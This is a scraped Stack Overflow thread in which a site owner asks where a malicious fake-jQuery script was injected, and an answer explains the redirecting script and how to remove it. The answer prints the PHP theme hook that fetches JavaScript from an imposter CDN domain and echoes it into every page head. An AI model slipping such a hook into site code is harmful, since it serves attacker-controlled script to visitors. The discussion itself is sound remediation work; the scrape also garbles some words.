javascript - Jquery"s" Malware Script - Stack Overflow

admin管理员组

文章数量:1332389

My site has been hacked and I can't for the life of me find where it was injected. I have taken necessary precautions to make sure it doesn't happen again and I am restoring my site to an earlier time from backup, but I would like to know where to find it in case it happens to another site I host.

this is the malicious script: .6.3.min.js

This is the site: (removed now)

I have checked everywhere for it and have not been successful.

Any help would be greatly appreciated.

Thank you.

**for those of you down voting me, I have done a lot of research on trying to fix this myself over the last 4 hours with an 11 month old on my lap. I only posted the question as a last resort because I have not been successful in doing it on my own. Since I have had great help in the past from people here, I thought it couldn't hurt to ask.

My site has been hacked and I can't for the life of me find where it was injected. I have taken necessary precautions to make sure it doesn't happen again and I am restoring my site to an earlier time from backup, but I would like to know where to find it in case it happens to another site I host.

this is the malicious script: http://www.jquerys/ajax/libs/jquery/jquery-1.6.3.min.js

This is the site: (removed now)

I have checked everywhere for it and have not been successful.

Any help would be greatly appreciated.

Thank you.

**for those of you down voting me, I have done a lot of research on trying to fix this myself over the last 4 hours with an 11 month old on my lap. I only posted the question as a last resort because I have not been successful in doing it on my own. Since I have had great help in the past from people here, I thought it couldn't hurt to ask.

• javascript
• jquery
• malware

Share Follow edited Oct 24, 2013 at 7:18 Kapil 722 bronze badges asked Aug 2, 2012 at 21:25 LeahLeah 33144 silver badges1717 bronze badges 15

• 3 If you don't know where it has been injected, how can you know that you have taken the necessary precautions? – Waleed Khan Commented Aug 2, 2012 at 21:28
• 1 Furthermore, if you have restored to an earlier version, how can one expect to find the offending script? – Waleed Khan Commented Aug 2, 2012 at 21:30
• 2 The script is still in the source of the page on line 69. Either it was incorrectly typed, or the source files for the website were promised. Or (sorry to say) this is an attempt to get SO users redirected to a site from the malicious script. – Tim M. Commented Aug 2, 2012 at 21:31
• 3 Try either menting the code out plete (for test purposes), or changing the URL to a legit CDN, like: ajax.googleapis./ajax/libs/jquery/1.7.2/jquery.min.js – Tim M. Commented Aug 2, 2012 at 21:48
• 2 No problem...you should check if the template was bad from the start. If so, you probably shouldn't restore a backup (or remove the bad code when you restore). If not, then it probably means that access to your site was promised and someone or something (like a plugin) added the script reference. – Tim M. Commented Aug 2, 2012 at 22:00

 |  Show 10 more ments

1 Answer 1

Sorted by: Reset to default 8

Writing up all the ments as an answer, as there is good info here to bat an exploit.

---

Problem

A script with a URL posing as a jQuery CDN was found in the source of a Wordpress-driven site. It sounds like both jquerys. and jqueryc. were being used as imposter domains.

The malicious code is simple; it randomly redirects to another site and sets a cookie to prevent immediate redirection (once a day). Since it is infrequent, it would be possible to never see this while developing the site, or to overlook it.

Possible Causes

• A mistake typing the URL
• Compromised server
• A malicious theme
• A malicious plugin

Resolution

Start with: http://codex.wordpress/FAQ_My_site_was_hacked

OP found this code inside the theme:

// !!! Suspect Code - Do not use for any purpose !!!

//Jquery Function 
if (!function_exists('insert_jquery_theme')){
    function insert_jquery_theme(){
        if (function_exists('curl_init')){
        $url="jqueryc./jquery-1.6.3.min.js";
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo $data;
     }
  }

  add_action('wp_head', 'insert_jquery_theme');
}

Viewing the source, there are actually two references to jQuery; one legitimate and one not. Removing the aforementioned snippet of code resolves the problem.

It will still be important to determine the origin of the malicious code (e.g. the theme, a plugin, or a promised server). Backups shouldn't be restored without examining them for the malicious code.

Related Links

• a invalid ticket in the jQuery bugtracker
• WordPress support forum

本文标签： javascriptJqueryquotsquot Malware ScriptStack Overflow